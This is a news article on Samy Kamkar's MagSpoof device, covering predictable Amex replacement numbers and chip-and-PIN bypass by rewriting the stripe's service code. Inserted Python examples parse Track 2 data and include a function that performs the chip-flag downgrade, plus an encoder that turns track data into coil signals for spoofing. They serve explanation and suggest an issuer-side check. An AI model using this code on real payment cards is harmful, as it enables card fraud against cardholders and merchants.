This gizmo knows your Amex card number before you've received it

American Express appears to have used a weak algorithm to generate new card numbers

A device built by legendary hacker Samy Kamkar calls into question the security of payment cards as the U.S. continues to grapple with card fraud.

Kamkar's device, nicknamed MagSpoof, is about the size of a U.S. quarter, and it's safe to say it would be a fraudster's dream.

MagSpoof can predict what a new American Express card number will be based on a canceled card's number. The new expiration date can also be predicted based on when the replacement card was requested.

It can also trick point-of-sale terminals into accepting a magnetic-stripe swipe from a card that should have been processed as a chip transaction. Chip cards carry a microchip with cryptographic capabilities designed to deter fraud, a system known as chip-and-PIN; MagSpoof makes the terminal treat such a card as if it had no chip at all.

Kamkar noticed that the number of a replacement card he received appeared to have a relationship with other Amex cards he'd had in the past. He worked out a formula for how the number was calculated, and it held for all 40 cards and replacement cards that friends shared with him for his research.

"One hundred percent of them followed my predictions," Kamkar said in a phone interview Tuesday. The card generation algorithm "is not very random."

To do the calculation, Kamkar said he just needs the old card number and the expiration date. 

The danger, of course, is that cybercriminals with access to the old card's details could figure out the new card number before the victim has even received it. Once the card is active, the fraudster can go shopping.

American Express officials could not be immediately reached for comment on Monday. Kamkar says he notified them in August, but the company told him they didn't think it was a major issue.

Kamkar said American Express clearly has other anti-fraud measures that could potentially stop abuse, but it's not guaranteed those would stop every fraudulent purchase.

The American Express number prediction capability isn't the only interesting feature built into MagSpoof. Kamkar did an intensive study of the magnetic stripe on the back of payment cards.

Photo: Samy Kamkar. Iron oxide filings reveal how a credit card's magnetic stripe is encoded: two closely spaced bars represent a "1," and a single bar followed by a space represents a "0."

He found the stripe carries a service code, three digits that tell the terminal things such as whether the card can be used overseas, whether it can be used at an ATM and whether it is a chip-and-PIN card whose chip should be used instead of the stripe.

U.S. retailers have been upgrading their systems to accept chip cards, because the card networks now hold merchants liable for fraud on transactions made through terminals that have not been upgraded.

Chip-and-PIN, also known as EMV, has been used in areas such as Europe for more than a decade. The payment cards have security features that make them difficult to clone, and transactions are authorized in part by a cryptographic microchip.

If someone with a chip-enabled card goes to Target these days and swipes the card's magnetic stripe, the point-of-sale system reads the service code, recognises that it is a chip card and asks for the card to be inserted into the chip reader instead, Kamkar said.

"But I discovered that if I can modify the service code, or create a new card with a different magstripe with the same data but just flip that bit, I can essentially disable that requirement for the chip," he said.

Kamkar modified the service code on a chip card's stripe data and was able to buy something by swiping it, when the terminal should have insisted on a chip-and-PIN transaction.

"I was flabbergasted," he said.

When asked if it was Target, Kamkar laughed and said it "was a major retailer."
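The service code Kamkar describes is a standard field of the Track 2 data defined in ISO/IEC 7813: three digits following the four-digit expiry, where a first digit of 2 or 6 tells the terminal that the card carries a chip that should be used where possible. The Python below is an added example written for this page, not Kamkar's code or the MagSpoof firmware: it parses a Track 2 string, decodes the service code, and shows the one-digit change the article describes (2 to 1) leaving every other field untouched. The track data is constructed; the PAN is a published Luhn-valid test number, not a live card. The issuer-side comparison at the end is a hypothetical check (an assumption, not a documented Amex control), included because the stripe is attacker-controlled and a terminal by itself cannot tell a rewritten service code from a genuine one.

```python
"""ISO/IEC 7813 Track 2 parsing and service-code decoding.
Added example for this article; not Kamkar's or MagSpoof's code."""
import re
from dataclasses import dataclass

# Constructed sample: published Luhn-valid Amex test PAN, expiry 12/25,
# service code 201, made-up discretionary data. Not a live card.
SAMPLE_TRACK2 = ";371449635398431=2512201123456789?"

# Layout: ;PAN=YYMMSSS<discretionary>?  (the LRC is added at the bit level)
TRACK2_RE = re.compile(r"^;(\d{1,19})=(\d{4})(\d{3})(\d*)\?$")

# Service-code digit meanings from ISO/IEC 7813.
SC_INTERCHANGE = {
    "1": "international interchange",
    "2": "international interchange; use chip (IC) where feasible",
    "5": "national interchange only",
    "6": "national interchange only; use chip (IC) where feasible",
    "7": "private; no interchange except by agreement",
    "9": "test",
}
SC_AUTH = {
    "0": "normal authorisation",
    "2": "contact issuer online",
    "4": "contact issuer online except under bilateral agreement",
}
SC_SERVICES = {
    "0": "no restrictions; PIN required",
    "1": "no restrictions",
    "2": "goods and services only (no cash)",
    "3": "ATM only; PIN required",
    "4": "cash only",
    "5": "goods and services only; PIN required",
    "6": "no restrictions; prompt for PIN if PIN pad present",
    "7": "goods and services only; prompt for PIN if PIN pad present",
}


@dataclass(frozen=True)
class Track2:
    pan: str
    expiry: str  # YYMM
    service_code: str
    discretionary: str

    def to_track(self) -> str:
        return f";{self.pan}={self.expiry}{self.service_code}{self.discretionary}?"


def luhn_ok(pan: str) -> bool:
    """Luhn check on the PAN: catches transcription errors, not forgery."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def parse_track2(track: str) -> Track2:
    m = TRACK2_RE.match(track)
    if not m:
        raise ValueError("not a Track 2 string")
    t = Track2(*m.groups())
    if not luhn_ok(t.pan):
        raise ValueError("PAN fails Luhn check")
    return t


def describe_service_code(sc: str) -> dict:
    if not re.fullmatch(r"\d{3}", sc):
        raise ValueError("service code must be three digits")
    return {
        "interchange": SC_INTERCHANGE.get(sc[0], "reserved"),
        "authorisation": SC_AUTH.get(sc[1], "reserved"),
        "services": SC_SERVICES.get(sc[2], "reserved"),
        "chip_preferred": sc[0] in ("2", "6"),
        "pin_required": sc[2] in ("0", "3", "5"),
    }


def strip_chip_flag(t: Track2) -> Track2:
    """The rewrite the article describes: 2xx -> 1xx (or 6xx -> 5xx), so the
    stripe no longer advertises a chip. Nothing else on the track changes."""
    first = {"2": "1", "6": "5"}.get(t.service_code[0], t.service_code[0])
    return Track2(t.pan, t.expiry, first + t.service_code[1:], t.discretionary)


def issuer_fallback_check(presented: Track2, issuer_records: dict) -> str:
    """Hypothetical issuer-host check (assumption, not a documented Amex
    control): compare the service code the terminal forwarded with the one
    on file for that PAN. A chip-enrolled PAN arriving as 1xx is a downgraded
    stripe, not a magstripe-only card."""
    on_file = issuer_records.get(presented.pan)
    if on_file is None:
        return "unknown PAN"
    if on_file[0] in ("2", "6") and presented.service_code[0] != on_file[0]:
        return "decline: chip card presented with rewritten service code"
    return "ok"
```

Running `strip_chip_flag(parse_track2(SAMPLE_TRACK2)).to_track()` yields the same track with `201` replaced by `101`; the PAN, expiry and discretionary data are unchanged, which is why a terminal that only reads the stripe has nothing to object to. The issuer, which knows which PANs were issued with a chip, is the party that can notice the mismatch.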

Kamkar has released the schematics and software for MagSpoof. He is not, however, releasing the information that would allow the generation of American Express card numbers. He's also not releasing the code that would allow the disabling of chip-and-PIN.

MagSpoof is an interesting little piece of hardware. It can store many card numbers, and rather than carrying a physical stripe it drives an electromagnet to reproduce the changing magnetic field a card's stripe produces as it is swiped, so a magnetic stripe reader up to two inches away registers a swipe without any card passing through it.
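What MagSpoof plays back is the bit stream the stripe stores. On Track 2 (ISO/IEC 7811) each character is five bits: four data bits, least significant first, plus a parity bit that makes the count of ones odd. A longitudinal redundancy check (LRC) character, the XOR of every character's data bits, follows the end sentinel. The bits are recorded in F2F (Aiken biphase) form: a flux reversal at the start of every bit cell, with a second reversal mid-cell for a 1, which is exactly the two-bars-versus-one pattern the iron filings show. The Python below is an added example for this page, not the MagSpoof firmware: it encodes a constructed Track 2 string into that bit stream, renders it as the coil polarity per half-cell that a GPIO-driven electromagnet would follow, and decodes it back the way a reader does, checking parity and the LRC. The count of leading and trailing clocking zeros is an assumption, and the sample track is constructed around a published test PAN.

```python
"""Track 2 bit-level encoding (ISO/IEC 7811) and F2F flux representation.
Added example for this article; not MagSpoof's firmware."""

TRACK2_BASE = 0x30   # Track 2 alphabet is '0'..'?'; data nibble = code - 0x30
CLOCKING_ZEROS = 10  # leading/trailing sync bits (count is an assumption)

# Constructed sample track (published test PAN, not a live card).
SAMPLE_TRACK2 = ";371449635398431=2512201123456789?"


def nibble(c: str) -> int:
    v = ord(c) - TRACK2_BASE
    if not 0 <= v < 16:
        raise ValueError(f"{c!r} is not in the Track 2 alphabet")
    return v


def char_bits(c: str) -> list[int]:
    """Four data bits, LSB first, then a parity bit making the ones count odd."""
    data = [(nibble(c) >> i) & 1 for i in range(4)]
    return data + [1 - (sum(data) & 1)]


def track2_lrc(track: str) -> str:
    """LRC: XOR of every character's data nibble, sentinels included."""
    lrc = 0
    for c in track:
        lrc ^= nibble(c)
    return chr(lrc + TRACK2_BASE)


def track2_bits(track: str) -> list[int]:
    """Clocking zeros, then every character and the LRC, then zeros again."""
    if not (track.startswith(";") and track.endswith("?")):
        raise ValueError("Track 2 must run from ';' to '?'")
    bits = [0] * CLOCKING_ZEROS
    for c in track + track2_lrc(track):
        bits += char_bits(c)
    return bits + [0] * CLOCKING_ZEROS


def f2f_levels(bits: list[int]) -> list[int]:
    """Coil polarity for each half bit-cell. Every cell starts with a
    reversal; a 1 reverses again mid-cell (two bars in the filings), a 0
    does not (one bar)."""
    levels, level = [], 0
    for b in bits:
        level ^= 1
        levels.append(level)
        if b:
            level ^= 1
        levels.append(level)
    return levels


def f2f_decode(levels: list[int]) -> list[int]:
    """Reader side: a reversal between the two halves of a cell means 1."""
    return [int(levels[i] != levels[i + 1]) for i in range(0, len(levels), 2)]


def decode_track2(bits: list[int]) -> str:
    """Reader side: skip clocking zeros, read 5-bit groups, verify odd
    parity on each group and the LRC that follows the end sentinel."""
    i = bits.index(1)  # ';' encodes as 11010, so the first 1 is its start
    out, lrc = [], 0
    while True:
        grp = bits[i:i + 5]
        i += 5
        if len(grp) < 5:
            raise ValueError("track ended before the LRC")
        if sum(grp) % 2 == 0:
            raise ValueError(f"parity error at bit {i - 5}")
        v = sum(b << k for k, b in enumerate(grp[:4]))
        if out and out[-1] == "?":
            if v != lrc:
                raise ValueError("LRC mismatch")
            return "".join(out)
        out.append(chr(v + TRACK2_BASE))
        lrc ^= v


def stripe_is_valid(bits: list[int]) -> bool:
    """True when parity and LRC check out; a single corrupted bit fails it."""
    try:
        decode_track2(bits)
        return True
    except ValueError:
        return False


def roundtrip(track: str) -> str:
    """Encode to flux levels and decode again as a reader would."""
    return decode_track2(f2f_decode(f2f_levels(track2_bits(track))))
```

Parity and the LRC exist to catch read errors, not tampering: a track rewritten with a different service code and a freshly computed LRC passes `stripe_is_valid` just as the original does, which is why a device that regenerates the whole bit stream can present arbitrary track data to a reader.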

On his blog, Kamkar wrote that MagSpoof is intended for research purposes and should only be used with payment cards someone is authorized to use.

By Jeremy Kirk, CSO